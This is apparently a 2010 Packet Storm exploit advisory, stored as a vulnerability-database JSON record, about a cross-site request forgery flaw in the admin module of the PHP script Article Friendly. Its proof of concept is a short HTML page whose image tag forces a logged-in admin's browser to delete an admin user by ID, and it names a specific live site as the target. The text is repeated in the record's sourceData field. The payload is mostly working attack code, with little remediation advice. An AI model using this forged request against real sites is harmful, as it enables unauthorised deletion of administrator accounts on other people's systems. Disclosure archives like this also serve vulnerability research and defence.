ID PACKETSTORM:86669 Type packetstorm Reporter Pratul Agrawal Modified 2010-02-25T00:00:00
Description
` =======================================================================
Article friendly CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Site p4ge http://www.articlefriendly.com/
# Plateform php
# Proof of concept #
Targeted URL: http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin
Script to delete the Admin user through Cross Site request forgery
. ..................................................................................................................
<html>
<body>
<img src=http://www.familyfriendsphotos.com/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] />
</body>
</html>
. ..................................................................................................................
After execution refresh the page and u can see that user having giving ID get deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
`
{"type": "packetstorm", "published": "2010-02-25T00:00:00", "reporter": "Pratul Agrawal", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "a0ff913e016c3f32d4a86b62bed1c44f"}, {"key": "modified", "hash": "b4a6e2d3ea9db02b543b396cfe424eb8"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "b4a6e2d3ea9db02b543b396cfe424eb8"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ce736cfd61e25f56ecd46eef1332867a"}, {"key": "sourceData", "hash": "03906b06eb2e7c34b1a2d530c95ba092"}, {"key": "sourceHref", "hash": "438bd5d8e9d77469cc2a101eddcc18d0"}, {"key": "title", "hash": "05ae796007a9d744decb95fd82275de6"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "` ======================================================================= \n \nArticle friendly CSRF Vulnerability \n \n======================================================================= \n \nby \n \nPratul Agrawal \n \n \n \n# Vulnerability found in- Admin module \n \n# email Pratulag@yahoo.com \n \n# company aksitservices \n \n# Credit by Pratul Agrawal \n \n# Site p4ge http://www.articlefriendly.com/ \n \n# Plateform php \n \n \n \n# Proof of concept # \n \nTargeted URL: http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin \n \n \nScript to delete the Admin user through Cross Site request forgery \n \n. .................................................................................................................. \n \n<html> \n \n<body> \n \n<img src=http://www.familyfriendsphotos.com/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] /> \n \n</body> \n \n</html> \n \n \n. .................................................................................................................. \n \n \n \nAfter execution refresh the page and u can see that user having giving ID get deleted automatically. \n \n \n#If you have any questions, comments, or concerns, feel free to contact me. \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:16:56", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/86669/Article-Friendly-Cross-Site-Request-Forgery.html", "sourceHref": "https://packetstormsecurity.com/files/download/86669/articlefriendly-xsrf.txt", "title": "Article Friendly Cross Site Request Forgery", "enchantments": {"vulnersScore": 4.3}, "references": [], "id": "PACKETSTORM:86669", "hash": "c945097560d674ffae35b70ac48d6b48fba3e2587a5b4e4ea02296b4b0f73527", "edition": 1, "cvelist": [], "modified": "2010-02-25T00:00:00", "description": ""}